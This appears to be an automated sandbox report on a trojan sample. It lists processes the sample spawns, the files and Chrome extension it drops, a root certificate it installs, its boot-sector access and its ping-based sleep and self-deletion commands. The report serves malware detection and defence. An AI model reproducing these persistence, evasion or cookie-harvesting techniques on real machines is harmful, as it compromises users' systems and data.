Source: 26FF190E7AE0F7C7.exe, 00000006.00000002.439843549.000000000330C000.00000004.00000001.sdmp, 26FF190E7AE0F7C7.exe, 00000007.00000002.370303228.000000000333C000.00000004.00000001.sdmp	Binary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
Source: 26FF190E7AE0F7C7.exe, 00000006.00000002.439843549.000000000330C000.00000004.00000001.sdmp, 26FF190E7AE0F7C7.exe, 00000007.00000002.370303228.000000000333C000.00000004.00000001.sdmp	Binary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
Source: 26FF190E7AE0F7C7.exe, 00000006.00000002.439843549.000000000330C000.00000004.00000001.sdmp, 26FF190E7AE0F7C7.exe, 00000007.00000002.370303228.000000000333C000.00000004.00000001.sdmp	Binary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' \|\| %Q \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: 26FF190E7AE0F7C7.exe, 00000006.00000002.439843549.000000000330C000.00000004.00000001.sdmp, 26FF190E7AE0F7C7.exe, 00000007.00000002.370303228.000000000333C000.00000004.00000001.sdmp	Binary or memory string: SELECT 'DELETE FROM vacuum_db.' \|\| quote(name) \|\| ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'

Source: SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe	Virustotal: Detection: 75%
Source: SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe	Metadefender: Detection: 25%
Source: SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe	ReversingLabs: Detection: 64%

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe

File read: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe'
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe	Process created: C:\Windows\SysWOW64\msiexec.exe msiexec.exe /i 'C:\Users\user\AppData\Local\Temp\gdiview.msi'
Source: unknown	Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 97BC0791AD59D06459021C46045665AB C
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe	Process created: C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe 0011 installp3
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe	Process created: C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe 200 installp3
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c ping 127.0.0.1 -n 3 & del 'C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe'
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe	Process created: C:\Users\user\AppData\Roaming\1618258522437.exe 'C:\Users\user\AppData\Roaming\1618258522437.exe' /sjson 'C:\Users\user\AppData\Roaming\1618258522437.txt'
Source: C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c taskkill /f /im chrome.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im chrome.exe
Source: C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c ping 127.0.0.1 -n 3 & del 'C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe'
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe	Process created: C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe ThunderFW 'C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exe'
Source: C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c ping 127.0.0.1 -n 3 & del 'C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe'
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe	Process created: C:\Windows\SysWOW64\msiexec.exe msiexec.exe /i 'C:\Users\user\AppData\Local\Temp\gdiview.msi'
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe	Process created: C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe 0011 installp3
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe	Process created: C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe 200 installp3
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c ping 127.0.0.1 -n 3 & del 'C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe'
Source: C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe	Process created: C:\Users\user\AppData\Roaming\1618258522437.exe 'C:\Users\user\AppData\Roaming\1618258522437.exe' /sjson 'C:\Users\user\AppData\Roaming\1618258522437.txt'
Source: C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe	Process created: C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe ThunderFW 'C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exe'
Source: C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c ping 127.0.0.1 -n 3 & del 'C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe'
Source: C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c taskkill /f /im chrome.exe
Source: C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c ping 127.0.0.1 -n 3 & del 'C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe'
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im chrome.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3

Source: C:\Windows\SysWOW64\msiexec.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{000C103E-0000-0000-C000-000000000046}\InProcServer32

Source: C:\Windows\SysWOW64\msiexec.exe	Automated click: Next >
Source: C:\Windows\SysWOW64\msiexec.exe	Automated click: Next >
Source: C:\Windows\SysWOW64\msiexec.exe	Automated click: Next >
Source: C:\Windows\SysWOW64\msiexec.exe	Automated click: Next >
Source: C:\Windows\SysWOW64\msiexec.exe	Automated click: Install

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe

Static file information: File size 4255416 > 1048576

Source: C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe

File opened: C:\Users\user\AppData\Local\Temp\download\msvcr71.dll

Source:	Binary string: d:\MiniTP\Src\MiniThunderPlatform\pdb\ProductForCommon\MiniThunderPlatform.pdb source: MiniThunderPlatform.exe.6.dr
Source:	Binary string: c:\Projects\VS2005\EdgeCookiesView\Release\EdgeCookiesView.pdb source: 1618258522437.exe, 0000000B.00000000.357295730.000000000040F000.00000002.00020000.sdmp, 1618258522437.exe.6.dr
Source:	Binary string: atl71.pdbT source: atl71.dll.6.dr
Source:	Binary string: msvcr71.pdb\ source: msvcr71.dll.6.dr
Source:	Binary string: atl71.pdb source: atl71.dll.6.dr
Source:	Binary string: cmd_insert_server.icex-conference/x-cooltalk.movievideo/x-sgi-movievideo/x-msvideo.mxuvideo/vnd.mpegurl.qtvideo/quicktimevideo/mpeg.xmltext/xml.etxtext/x-setext.wmlstext/vnd.wap.wmlscript.wmltext/vnd.wap.wml.tsvtext/tab-separated-values.sgmtext/sgml.rtftext/rtf.rtxtext/richtext.txttext/plain.html.csstext/css.mshmodel/mesh.igsmodel/iges.xwdimage/x-xwindowdump.xpmimage/x-xpixmap.xbmimage/x-xbitmap.rgbimage/x-rgb.ppmimage/x-portable-pixmap.bgmimage/x-portable-graymap.pbmimage/x-portable-bitmap.pnmimage/x-portable-anymap.rasimage/x-cmu-raster.wbmpimage/vnd.wap.wbmp.djvimage/vnd.djvu.tiffimage/tiff.pngimage/png.jpgimage/jpeg.iefimage/ief.gifimage/gif.bmpimage/bmp.xyzchemical/x-xyz.pdbchemical/x-pdb.wavaudio/x-wavaudio/x-realaudio.arpmaudio/x-pn-realaudio-pluginaudio/x-pn-realaudio.m3uaudio/x-mpegurl.aifaudio/x-aiffaudio/mpeg.midiaudio/midiapplication/application/zip.xhtmlapplication/xhtml+xml.srcapplication/x-wais-source.ustarapplication/x-ustar.msapplication/x-troff-ms.meapplication/x-troff-me.manapplication/x-troff-man.texiapplication/x-texinfo.texapplication/x-tex.tclapplication/x-tclapplication/x-tar.sv4crcapplication/x-sv4crc.sv4cpioapplication/x-sv4cpio.sitapplication/x-stuffit.swfapplication/x-shockwave-flash.sharapplication/x-shar.shapplication/x-sh.latexapplication/x-latex.jsapplication/x-javascript.hdfapplication/x-hdf.gtarapplication/x-gtar.splapplication/x-futuresplash.dviapplication/x-dvi.cshapplication/x-csh.cpioapplication/x-cpio.pgnapplication/x-chess-pgn.vcdapplication/x-cdlink.bcpioapplication/x-bcpio.wmlscapplication/vnd.wap.wmlscriptc.wmlcapplication/vnd.wap.wmlc.wbxmlapplication/vnd.wap.wbxml.pptapplication/vnd.ms-powerpoint.xlsapplication/vnd.ms-excel.mifapplication/vnd.mif.smiapplication/smil.pdfapplication/pdf.odaapplication/oda.docapplication/msword.cptapplication/mac-compactpro.hqxapplication/mac-binhex40.ezapplication/andrew-inset source: download_user.dll.6.dr
Source:	Binary string: d:\MiniDownloadLib\branches\bin\Product Release\download_user.pdb source: download_user.dll.6.dr
Source:	Binary string: f:\sys\objfre_wxp_x86\i386\FsFilter32.pdbpJ source: 26FF190E7AE0F7C7.exe, 00000006.00000002.439843549.000000000330C000.00000004.00000001.sdmp, 26FF190E7AE0F7C7.exe, 00000007.00000002.370303228.000000000333C000.00000004.00000001.sdmp
Source:	Binary string: d:\MiniTP\Src\MiniThunderPlatform\pdb\ProductForCommon\MiniThunderPlatform.pdbt source: MiniThunderPlatform.exe.6.dr
Source:	Binary string: d:\MiniTP\Src\MiniThunderPlatform\pdb\ProductForCommon\xldl.pdb source: xldl.dll.6.dr
Source:	Binary string: msvcp71.pdb source: msvcp71.dll.6.dr
Source:	Binary string: e:\xl7\Product Release\dl_peer_id.pdb0 source: dl_peer_id.dll.6.dr
Source:	Binary string: f:\sys\objfre_wxp_x86\i386\FsFilter32.pdb source: 26FF190E7AE0F7C7.exe, 00000006.00000002.439843549.000000000330C000.00000004.00000001.sdmp, 26FF190E7AE0F7C7.exe, 00000007.00000002.370303228.000000000333C000.00000004.00000001.sdmp
Source:	Binary string: d:\workspace\xlframework\win32_component\ThunderFW\Release\ThunderFW.pdb source: ThunderFW.exe, 0000001B.00000002.420452829.0000000000B9C000.00000002.00020000.sdmp, ThunderFW.exe.6.dr
Source:	Binary string: f:\sys\objfre_win7_amd64\amd64\FsFilter64.pdb source: 26FF190E7AE0F7C7.exe, 00000006.00000002.439843549.000000000330C000.00000004.00000001.sdmp, 26FF190E7AE0F7C7.exe, 00000007.00000002.370303228.000000000333C000.00000004.00000001.sdmp
Source:	Binary string: e:\xl7\Product Release\dl_peer_id.pdb source: dl_peer_id.dll.6.dr
Source:	Binary string: msvcr71.pdb source: msvcr71.dll.6.dr
Source:	Binary string: d:\BranchAI\launcher\Release\fileLauncher.pdb source: MSI39DD.tmp.3.dr

Data Obfuscation:

Detected unpacking (creates a PE file in dynamic memory)

Show sources

Source: C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe

Unpacked PE file: 6.2.26FF190E7AE0F7C7.exe.2660000.5.unpack

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe

Code function: 0_2_00408D68 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe	Code function: 0_2_00403E2C push edx; ret
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe	Code function: 0_2_00404042 push edx; ret
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe	Code function: 0_2_004040D9 push edx; ret
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe	Code function: 0_2_004038A0 push eax; ret
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe	Code function: 0_2_00403FA9 push edx; ret
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe	Code function: 0_2_100105D9 push ecx; ret
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 3_2_0521F289 push edx; retf
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 3_2_07E3F129 push edx; retf
Source: C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe	Code function: 6_2_100105D9 push ecx; ret
Source: C:\Users\user\AppData\Roaming\1618258522437.exe	Code function: 11_2_0040E2F1 push ecx; ret
Source: C:\Users\user\AppData\Roaming\1618258522437.exe	Code function: 11_2_0040E340 push eax; ret
Source: C:\Users\user\AppData\Roaming\1618258522437.exe	Code function: 11_2_0040E340 push eax; ret
Source: C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe	Code function: 27_2_00B93FB5 push ecx; ret

Persistence and Installation Behavior:

Contains functionality to infect the boot sector

Show sources

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe	Code function: _memset,wsprintfW,CreateFileW,DeviceIoControl,_memset,CloseHandle,CloseHandle, \\.\PhysicalDrive%d
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe	Code function: wsprintfW,CreateFileW,_memset,DeviceIoControl,_memset,FindCloseChangeNotification, \\.\PhysicalDrive%d
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe	Code function: wsprintfW,CreateFileW,DeviceIoControl,DeviceIoControl,CloseHandle, \\.\PhysicalDrive%d
Source: C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe	Code function: _memset,wsprintfW,CreateFileW,DeviceIoControl,_memset,CloseHandle,CloseHandle, \\.\PhysicalDrive%d
Source: C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe	Code function: wsprintfW,CreateFileW,_memset,DeviceIoControl,_memset,CloseHandle, \\.\PhysicalDrive%d
Source: C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe	Code function: wsprintfW,CreateFileW,DeviceIoControl,DeviceIoControl,CloseHandle, \\.\PhysicalDrive%d

Installs new ROOT certificates

Show sources

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe

Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\6C0CE2DD0584C47CAC18839F14055F19FA270CDD Blob

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe	File created: C:\Users\user\AppData\Local\Temp\download\dl_peer_id.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe	File created: C:\Users\user\AppData\Local\Temp\download\download_user.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe	File created: C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe	File created: C:\Users\user\AppData\Local\Temp\download\msvcp71.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe	File created: C:\Users\user\AppData\Local\Temp\xldl.dll	Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe	File created: C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe	Jump to dropped file
Source: C:\Windows\SysWOW64\msiexec.exe	File created: C:\Users\user\AppData\Local\Temp\MSI39DD.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe	File created: C:\Users\user\AppData\Roaming\1618258522437.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe	File created: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe	File created: C:\Users\user\AppData\Local\Temp\download\atl71.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe	File created: C:\Users\user\AppData\Local\Temp\download\msvcr71.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe	File created: C:\Users\user\AppData\Local\Temp\download\zlib1.dll	Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe	File created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\cgnliiolndkgeojpohkplpfbdgnhnmaa	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe	File created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\cgnliiolndkgeojpohkplpfbdgnhnmaa\1.0.0.0_0	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe	File created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\cgnliiolndkgeojpohkplpfbdgnhnmaa\1.0.0.0_0\icon.png	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe	File created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\cgnliiolndkgeojpohkplpfbdgnhnmaa\1.0.0.0_0\icon48.png	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe	File created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\cgnliiolndkgeojpohkplpfbdgnhnmaa\1.0.0.0_0\popup.html	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe	File created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\cgnliiolndkgeojpohkplpfbdgnhnmaa\1.0.0.0_0\background.js	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe	File created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\cgnliiolndkgeojpohkplpfbdgnhnmaa\1.0.0.0_0\book.js	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe	File created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\cgnliiolndkgeojpohkplpfbdgnhnmaa\1.0.0.0_0\jquery-1.8.3.min.js	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe	File created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\cgnliiolndkgeojpohkplpfbdgnhnmaa\1.0.0.0_0\popup.js	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe	File created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\cgnliiolndkgeojpohkplpfbdgnhnmaa\1.0.0.0_0\manifest.json	Jump to behavior

Boot Survival:

Contains functionality to infect the boot sector

Show sources

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe	Code function: _memset,wsprintfW,CreateFileW,DeviceIoControl,_memset,CloseHandle,CloseHandle, \\.\PhysicalDrive%d
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe	Code function: wsprintfW,CreateFileW,_memset,DeviceIoControl,_memset,FindCloseChangeNotification, \\.\PhysicalDrive%d
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe	Code function: wsprintfW,CreateFileW,DeviceIoControl,DeviceIoControl,CloseHandle, \\.\PhysicalDrive%d
Source: C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe	Code function: _memset,wsprintfW,CreateFileW,DeviceIoControl,_memset,CloseHandle,CloseHandle, \\.\PhysicalDrive%d
Source: C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe	Code function: wsprintfW,CreateFileW,_memset,DeviceIoControl,_memset,CloseHandle, \\.\PhysicalDrive%d
Source: C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe	Code function: wsprintfW,CreateFileW,DeviceIoControl,DeviceIoControl,CloseHandle, \\.\PhysicalDrive%d

Source: C:\Users\user\AppData\Roaming\1618258522437.exe

Code function: 11_2_0040C41D GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

Source: C:\Windows\SysWOW64\msiexec.exe

Registry key monitored for changes: HKEY_CURRENT_USER_Classes

Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\1618258522437.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Contains functionality to detect sleep reduction / modifications

Show sources

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe	Code function: 0_2_10020600
Source: C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe	Code function: 6_2_10020600

Uses ping.exe to sleep

Show sources

Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe

Code function: 0_2_100197E0 SetupDiGetDeviceRegistryPropertyA,GetLastError,_memset,SetupDiGetDeviceRegistryPropertyA,

Source: C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\download\dl_peer_id.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\download\download_user.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\download\msvcp71.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\xldl.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\download\atl71.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\download\msvcr71.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\download\zlib1.dll	Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe	Code function: 6_2_10020600
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe	Code function: 0_2_10020600

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe TID: 6632	Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe TID: 6984	Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe TID: 6984	Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe TID: 7020	Thread sleep time: -30000s >= -30000s

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe

File opened: PhysicalDrive0

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe	Code function: 0_2_10022710 GetLocalTime followed by cmp: cmp dword ptr [ebp-000002a0h], 06h and CTI: ja 10022C96h
Source: C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe	Code function: 6_2_10022710 GetLocalTime followed by cmp: cmp dword ptr [ebp-000002a0h], 06h and CTI: ja 10022C96h

Source: C:\Windows\SysWOW64\msiexec.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\SysWOW64\msiexec.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\SysWOW64\msiexec.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\SysWOW64\msiexec.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\SysWOW64\msiexec.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\SysWOW64\msiexec.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\SysWOW64\msiexec.exe	File Volume queried: C:\ FullSizeInformation

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe	Code function: 0_2_1001A1D0 FindFirstFileA,FindClose,
Source: C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe	Code function: 6_2_1001A1D0 FindFirstFileA,FindClose,

Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Google\
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\
